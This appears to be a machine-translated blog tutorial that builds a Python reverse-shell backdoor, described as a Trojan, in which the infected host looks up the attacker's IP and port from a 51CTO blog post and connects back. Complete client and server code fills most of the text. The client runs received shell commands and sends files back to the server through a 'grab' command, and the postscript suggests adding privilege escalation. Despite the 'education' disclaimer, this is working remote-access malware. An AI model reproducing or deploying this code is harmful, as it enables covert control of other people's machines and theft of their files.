Communication only, communication only.
In addition to 51CTO of course can also use other media, such as Weibo, and so on. You can use 51CTO here.
Idea: There is such a situation, we put a Trojan horse on a machine ~ ~ ~ Inside we will write their own server IP, but may be our IP will change, we can certainly use domain name to solve this problem, but that is not very elegant, and the domain name to Money ~ ~ ~ ~ ~ ~ ~ so we need a middleware!
In saying what is the rebound shell, the advantage of rebound shell is that the attacked host may limit the import, that is, only allow a link to one port, other links are blocked, this time we need to be attacked by the host to actively connect our server, our server just listen to a port, Wait for the attacked host to connect.
Implementation principle:
The target host accesses the 51CTO Web site to obtain the server IP and port that need to be connected.
650) this.width=650; "src=" Http://s2.51cto.com/wyfs02/M01/7A/AF/wKiom1awQXPyZvSoAAA33ruNj2U510.png "title=" Clipboard.png "alt=" Wkiom1awqxpyzvsoaaa33runj2u510.png "/>
How to achieve it?
Note: Because it is the nature of education purpose, so there is no more advanced features, more advanced I will not, here is just the simple TCP client,tcp server side
First, create a simple TCP server to listen to the connected TCP CLient.
#coding: Utf-8import socketdef connect (): ## #初始socket对象 s = socket.socket (Socket.af_inet,socket. SOCK_STREAM) ## #绑定IP跟端口 s.bind (("IP", PORT) ## #允许一个连接, self-setting s.listen (1) ### Call the Accept method and start listening conn,addr = s.accept () ### Output Client connection information, return result is an IP plus port tuple print ---> we got a connection from: ", addr ## #循化用于接收发送的命令 while true : command = raw_input ("shell>") ## #如果命令中用exit关键词则关闭连接 if " Exit " in command: Conn.send ("Exit") conn.close () break else: conn.send (command)             PRINT CONN.RECV (1024x768) def Main (): connect () if __name__ == ' __main__ ': main ( )
We then create a TCP client to connect to the TCP server side
import socketimport subprocessimport oshost = "server-side IP" port = server portdef connect (Host,port): s = socket.socket (Socket.af_inet,socket. Sock_stream) s.connect ((host,port)) while True:       COMMAND = S.RECV (1024x768) if "Exit" in command: s.close () break else: ### The command sent over the server is executed through subprocess cmd = subprocess. Popen (command,shell=true,stdout=subprocess. Pipe,stderr=subprocess. Pipe,stdin=subprocess. PIPE) ## #返回标注输出, Errors s.send (CMD.stdout.read ()) s.send (CMD.stderr.read ()) Def main (): connect (Host,port) if __name__ == ' __main__ ': main ()
Because there is no decision to connect to the server, so we have to run the server, and then run the client, the results are as follows
650) this.width=650; "src=" Http://s5.51cto.com/wyfs02/M02/7A/AE/wKioL1awQgPAuW6lAABB4NOE1J4807.png "title=" Clipboard2.png "alt=" Wkiol1awqgpauw6laabb4noe1j4807.png "/>
At this point, the first step is complete.
Now we need to put the server IP and port on the 51CTO blog.
650) this.width=650; "src=" Http://s2.51cto.com/wyfs02/M01/7A/AE/wKioL1awQiLz-AGuAAC8k3emKDw693.png "title=" Clipboard3.png "alt=" Wkiol1awqilz-aguaac8k3emkdw693.png "/>
Now create an article as shown in the blog post.
Then use requests,BeautifulSoup the two libraries to get the information we want.
Import requests
Import JSON
From BS4 import BeautifulSoup
url = "http://youerning.blog.51cto.com/"
Simply step on the point before getting it.
650) this.width=650; "src=" Http://s5.51cto.com/wyfs02/M02/7A/AE/wKioL1awQmnQw3yfAAB_1Os4TxE572.png "title=" Clipboard4.png "alt=" Wkiol1awqmnqw3yfaab_1os4txe572.png "/>
Through Chrom debug mode, we find the content of this content, such as Div,class, as shown in the class= we found "artcontent mt10", this is the information we want, of course, There are many ways to filter out the information we need with BeautifulSoup, which is not the same.
def gethost (URL):
ret = requests.get (URL). Content
Soup = BeautifulSoup (ret, "Html.parser")
For I in Soup.find_all ("div", class_= "Artcontent mt10"):
If I.string.startswith ("{"):
ret = str (i.string)
ret = json.loads (ret)
return ret["host"], ret["Port"]
Print gethost (URL)
The operation results are as follows
650) this.width=650; "src=" Http://s1.51cto.com/wyfs02/M01/7A/AF/wKiom1awQjDz-nn0AAANVm3uR7w677.png "title=" Clipboard5.png "alt=" Wkiom1awqjdz-nn0aaanvm3ur7w677.png "/>
At this point, the second part has been completed, the complete code is as follows
Client py File
import socketimport subprocessimport osimport requestsimport jsonfrom bs4 import beautifulsoupurl = "http://youerning.blog.51cto.com/" Def transfer (S,path): if os.path.exists (PATH): f = Open (Path, "RB") packet = f.read (1024x768) while packet != "": s.send (packet) packet = f.read (1024x768) s.send ("Done") f.close () def gethost (URL): ret = requests.get (URL). Content soup = beautifulsoup (ret, "Html.parser" ) for&nbsP;i in soup.find_all ("div", class_= "artcontent mt10"): if i.string.startswith (" {"): ret = str (i.string) ret = json.loads (ret) return ret["Host"],ret["Port"]def connect (host,port): s = socket.socket (Socket.af_inet,socket. Sock_stream) s.connect ((host,port)) while True:       COMMAND = S.RECV (1024x768) if "Exit" in command: s.close () break elif "Grab" in command: &nbsP; grab,path = command.split ("*") try: transfer (S,path) except Exception,e: s.send (str (e)) pass else: cmd = subprocess. Popen (command,shell=true,stdout=subprocess. Pipe,stderr=subprocess. Pipe,stdin=subprocess. PIPE) s.send (CMD.stdout.read ()) s.Send (CMD.stderr.read ()) Def main (): host,port = gethost (URL) connect (Host,port) Main ()
Server-side py file
#coding:utf-8import socketip = "Your IP" port = bound port Def transfer (Conn,command): conn.send (command) f = open ("Text.text", "WB")    WHILE TRUE:        BITS = CONN.RECV ( 1024x768) if "unable to find out the File " in bits: print "-- -- unbale to " break if bits.endswith ("Done"): print "Done" f.close () break &nBsp; f.write (BITS) f.close () Def connect (): s = socket.socket (Socket.af_inet,socket. Sock_stream) s.bind (("IP", PORT)) s.listen (1) conn,addr = s.accept () print "---> we got a connection from: ",addr while true: command = raw_input ("shell>") if "Exit" in command: Conn.send ("Exit") conn.close () break elif "Grab" in command: &Nbsp; transfer (Conn,command) else: conn.send (command)         PRINT CONN.RECV (1024x768) def main (): connect () Main ()
PostScript: In fact, the last two complete Python script, add a transfer function, used to transfer files, is an egg bar, although I do not know what the meaning of eggs, but there are many functions can be added, such as looking for files, to mention the right or anything.
This article is from the "Ear Notebook" blog, please make sure to keep this source http://youerning.blog.51cto.com/10513771/1740646
Python rebound shell backdoor with 51CTO blog binding